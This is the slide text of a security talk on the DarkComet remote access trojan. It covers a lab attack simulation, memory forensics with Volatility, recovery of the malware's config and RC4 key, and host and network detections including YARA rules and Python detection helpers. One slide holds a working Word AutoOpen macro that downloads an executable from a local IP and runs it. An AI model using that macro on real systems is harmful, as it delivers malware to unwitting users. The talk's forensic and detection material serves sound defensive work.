DarkComet Blackhat
Tyler Halfpop, Fidelis Cybersecurity
$ whoami
• Threat Researcher for Fidelis CyberSecurity
• Working on doctorate in computer science
• SANS Lethal Forensicator
• CISSP, GREM
• Site: tylerhalfpop.com | Twitter: @tylerhalfpop
About This Talk
• DarkComet at 100mph
• What?
• How?
• Response
DarkComet About Screen
DarkComet About
Names: DarkComet, DarkKomet, Fynlos, Fynloski
Fully featured RAT written in Delphi
Attack Simulation
Word Doc with Macro
Sub AutoOpen()
    Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP")
    Dim bStrm: Set bStrm = CreateObject("Adodb.Stream")
    xHttp.Open "GET", "http://192.168.66.254/bad.exe", False
    xHttp.Send
    With bStrm
        .Type = 1
        .Open
        .write xHttp.responseBody
        .savetofile "bad.exe", 2
    End With
    Shell ("bad.exe")
End Sub
Attack Simulation Build Video
• Build the downloader
• Build the DarkComet implant
• Setup the Client Listener
Attack Simulation Video
• Victim opens the word document
• Downloads and executes the downloader
• Downloader downloads and executes the DarkComet RAT
• RAT controller has full control of the victim system
Memory Forensics with Volatility
python vol.py -f /vt/demo/WIN-JN4BO8C9KHA-20150401-214850.raw --profile=Win7SP1x86 psxview
Volatility Foundation Volatility Framework 2.4
Offset(P)  Name                 PID    pslist psscan thrdproc pspcid csrss session deskthrd
---------- -------------------- ------ ------ ------ -------- ------ ----- ------- --------
0x3fd6ca58 svchost.exe          3348   True   True   True     True   True  True    True
0x3e659030 OSPPSVC.EXE          4060   True   True   True     True   True  True    True
0x3fa5f488 DumpIt.exe           2888   True   True   True     True   True  True    True
0x3e8db030 lsass.exe            496    True   True   True     True   True  True    False
0x3e6ea030 vmtoolsd.exe         1536   True   True   True     True   True  True    True
0x3fdba8a8 sppsvc.exe           3304   True   True   True     True   True  True    True
0x3e6670f0 spoolsv.exe          1284   True   True   True     True   True  True    True
0x3e8dc9b0 lsm.exe              504    True   True   True     True   True  True    False
0x3e963688 svchost.exe          616    True   True   True     True   True  True    True
0x3e475d40 conhost.exe          708    True   True   True     True   True  True    True
0x3e8a4848 winlogon.exe         428    True   True   True     True   True  True    True
0x3fa51030 msdcsc.exe           3384   True   True   True     True   True  True    True
0x3e473a78 TPAutoConnect.       644    True   True   True     True   True  True    True
0x3f27fd40 csrss.exe            392    True   True   True     True   False True    True
0x3f264030 csrss.exe            344    True   True   True     True   False True    True
0x3f2f2d40 smss.exe             252    True   True   True     True   False False   False
0x3fffa9e8 System               4      True   True   True     True   False False   False
Memory Forensics with Volatility
python vol.py -f /vt/demo/WIN-JN4BO8C9KHA-20150401-214850.raw --profile=Win7SP1x86 memdump -p 3384 --dump-dir /vt/demo/
Volatility Foundation Volatility Framework 2.4
************************************************************************
Writing msdcsc.exe [  3384] to 3384.dmp
Memory Forensics with Volatility
strings -a /vt/demo/3384.dmp | less
…
#BEGIN DARKCOMET DATA --
MUTEX={DC_MUTEX-C8LPD3P}
SID={Guest16}
FWB={0}
NETDATA={192.168.66.10:1604}
GENCODE={U69tAi8fwsqT}
INSTALL={1}
COMBOPATH={7}
EDTPATH={MSDCSC\msdcsc.exe}
KEYNAME={MicroUpdate}
EDTDATE={16/04/2007}
PERSINST={0}
MELT={0}
CHANGEDATE={0}
DIRATTRIB={0}
FILEATTRIB={0}
FAKEMSG={1}
MSGTITLE={Don't Worry}
MSGCORE={49742773206E6F2070726F626C656D210D0A}
MSGICON={64}
OFFLINEK={1}
#EOF DARKCOMET DATA --
…
#KCMDDC51#-890
The RC4 key string recovered from the dump decrypts the default network banner (Python 3 with pycryptodome; the original slide used the Python 2 print statement):
python -c "from Crypto.Cipher import ARC4; print(ARC4.new(b'#KCMDDC51#-890').decrypt(bytes.fromhex('BF7CAB464EFB')).decode())"
IDTYPE
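As an added example (not code from the talk), a small extractor that pulls the DarkComet configuration block shown in the strings output above out of dump text and reduces it to the indicators a responder pivots on. The sample input is constructed from the values on the slide, and the field names (MUTEX, NETDATA, EDTPATH, KEYNAME, MSGCORE and so on) are taken from that block.

```python
import re

# Constructed sample input: the config block recovered above from the msdcsc.exe
# memory dump (PID 3384), plus the surrounding lines `strings` would emit with it.
SAMPLE_STRINGS = """\
#BEGIN DARKCOMET DATA --
MUTEX={DC_MUTEX-C8LPD3P}
NETDATA={192.168.66.10:1604}
INSTALL={1}
EDTPATH={MSDCSC\\msdcsc.exe}
KEYNAME={MicroUpdate}
FAKEMSG={1}
MSGTITLE={Don't Worry}
MSGCORE={49742773206E6F2070726F626C656D210D0A}
OFFLINEK={1}
#EOF DARKCOMET DATA --
#KCMDDC51#-890
"""

CONFIG_RE = re.compile(r"#BEGIN DARKCOMET DATA --\s*(.*?)\s*#EOF DARKCOMET DATA --", re.S)
FIELD_RE = re.compile(r"^([A-Z]+)=\{(.*)\}$", re.M)
MUTEX_RE = re.compile(r"^DC_MUTEX-[A-Z0-9]{7}$")  # default mutex shape from the host detections

def parse_config(text):
    """Return the key/value pairs of the first DarkComet config block in text, or None."""
    m = CONFIG_RE.search(text)
    if not m:
        return None
    return dict(FIELD_RE.findall(m.group(1)))

def extract_iocs(cfg):
    """Reduce the raw config to the indicators a responder pivots on."""
    host, _, port = cfg.get("NETDATA", "").rpartition(":")
    iocs = {
        "c2_host": host,
        "c2_port": int(port) if port.isdigit() else None,
        "mutex": cfg.get("MUTEX"),
        "default_mutex": bool(MUTEX_RE.match(cfg.get("MUTEX", ""))),
        "install_path": cfg.get("EDTPATH"),
        "run_key_name": cfg.get("KEYNAME") if cfg.get("INSTALL") == "1" else None,
        "offline_keylogger": cfg.get("OFFLINEK") == "1",
    }
    if cfg.get("FAKEMSG") == "1":  # decoy message box text is stored hex-encoded
        iocs["fake_message"] = bytes.fromhex(cfg["MSGCORE"]).decode("latin-1")
    return iocs

if __name__ == "__main__":
    for key, value in extract_iocs(parse_config(SAMPLE_STRINGS)).items():
        print(f"{key:18} {value!r}")
```

Feed it the output of strings over a process dump and the C2 host, mutex and persistence key name come out ready to feed into host and network detections.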
Host Detections
Default Mutex: DC_MUTEX-[A-Z0-9]{7}
Default Dropped File: *\MSDCSC\msdcsc.exe
Keylog Files: %TMP%/dclogs/YYYY-MM-DD-#.dc
Registry Persistence: HKCU\Software\Microsoft\Windows\CurrentVersion\Run and HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Hidden iexplorer.exe processes with no visible parent process
Host file changes
5.4 Legacy Server Module has a visible GUI and system tray icon
Yara Rules
rule DarkComet {
    meta:
        description = "DarkComet RAT"
        author = "Fidelis Cybersecurity"
        date = "2015-07-22"
    strings:
        $s1 = "#KCMDDC"
        $s2 = "DCDATA"
        $s3 = "#BOT#CloseServer"
        $s4 = "#BOT#SvrUninstall"
        $s5 = "#BOT#URLDownload"
    condition:
        uint16(0) == 0x5a4d and filesize < 50MB and all of ($s*)
}

rule DarkCometDownloader {
    meta:
        description = "DarkComet RAT"
        author = "Fidelis Cybersecurity"
        date = "2015-07-22"
    strings:
        $s1 = {6A00FF15F0304000A30D1040006A0A68261040006A00FF15F4304000A311104000FF35111040006A00FF15F8304000A315104000FF35111040006A00FF15FC304000A319104000FF3515104000FF1500314000A31D104000FF3519104000FF351D104000682C114000FF1508314000FF3515104000FF150C31400031C0682C104000682C104000FF15143140006805104000682C104000FF1510314000682C104000FF15183140006A006A00682C104000682C1140006A00FF15803040006A056A006A00682C10400068001040006A00FF15A83040006A00FF1504314000}
    condition:
        uint16(0) == 0x5a4d and filesize < 10KB and all of them
}
Network Detections
Default Port: 1604 TCP
Dynamic DNS: No-IP.com
Default Banners:
8EA4AB05FA7EB47CB892B702C7CF9C7CD932155CAD31A61F1164805C82EEBF7CAB464EFB
Check for regular beaconing, and inspect FTP traffic because the keylogger can be configured to deliver its logs over FTP.
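As an added example (not from the talk), the regular-beaconing check above run over a constructed flow log: connections are grouped per source, destination and port, and a group is flagged when its inter-arrival times are nearly constant, with the DarkComet default port 1604 called out. The log format, hosts and thresholds are assumptions for the demonstration.

```python
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample flow log, one line per connection: "timestamp src dst:port proto".
# 10.0.0.5 reaches 192.168.66.10:1604 roughly every 20 s (the DarkComet default port),
# while 10.0.0.7's HTTPS connections are irregular.
SAMPLE_LOG = """\
2015-04-01T21:48:50 10.0.0.5 192.168.66.10:1604 tcp
2015-04-01T21:48:53 10.0.0.7 93.184.216.34:443 tcp
2015-04-01T21:49:10 10.0.0.5 192.168.66.10:1604 tcp
2015-04-01T21:49:30 10.0.0.5 192.168.66.10:1604 tcp
2015-04-01T21:49:41 10.0.0.7 93.184.216.34:443 tcp
2015-04-01T21:49:50 10.0.0.5 192.168.66.10:1604 tcp
2015-04-01T21:50:11 10.0.0.5 192.168.66.10:1604 tcp
2015-04-01T21:50:30 10.0.0.5 192.168.66.10:1604 tcp
2015-04-01T21:52:02 10.0.0.7 93.184.216.34:443 tcp
2015-04-01T21:55:49 10.0.0.7 93.184.216.34:443 tcp
"""

DARKCOMET_DEFAULT_PORT = 1604

def find_beacons(log_text, min_flows=4, max_jitter=0.15):
    """Group flows by (src, dst, port) and report the groups whose inter-arrival
    times are nearly constant: coefficient of variation (stdev/mean) <= max_jitter."""
    stamps_by_flow = defaultdict(list)
    for line in log_text.splitlines():
        ts, src, dst, _proto = line.split()
        host, _, port = dst.rpartition(":")
        stamps_by_flow[(src, host, int(port))].append(datetime.fromisoformat(ts))
    hits = []
    for (src, host, port), stamps in stamps_by_flow.items():
        if len(stamps) < min_flows:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        period = mean(gaps)
        jitter = pstdev(gaps) / period if period else float("inf")
        if jitter <= max_jitter:
            hits.append({"src": src, "dst": host, "port": port,
                         "period_s": round(period, 1), "jitter": round(jitter, 3),
                         "darkcomet_default_port": port == DARKCOMET_DEFAULT_PORT})
    return hits

if __name__ == "__main__":
    for hit in find_beacons(SAMPLE_LOG):
        print(hit)
```

A flagged group on port 1604 is a strong pivot back to the host indicators above; a flagged group on another port still deserves a look, since the port is configurable.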
QUESTIONS? THANK YOU
@tylerhalfpop tylerhalfpop.com | @FidSecSys fidelissecurity.com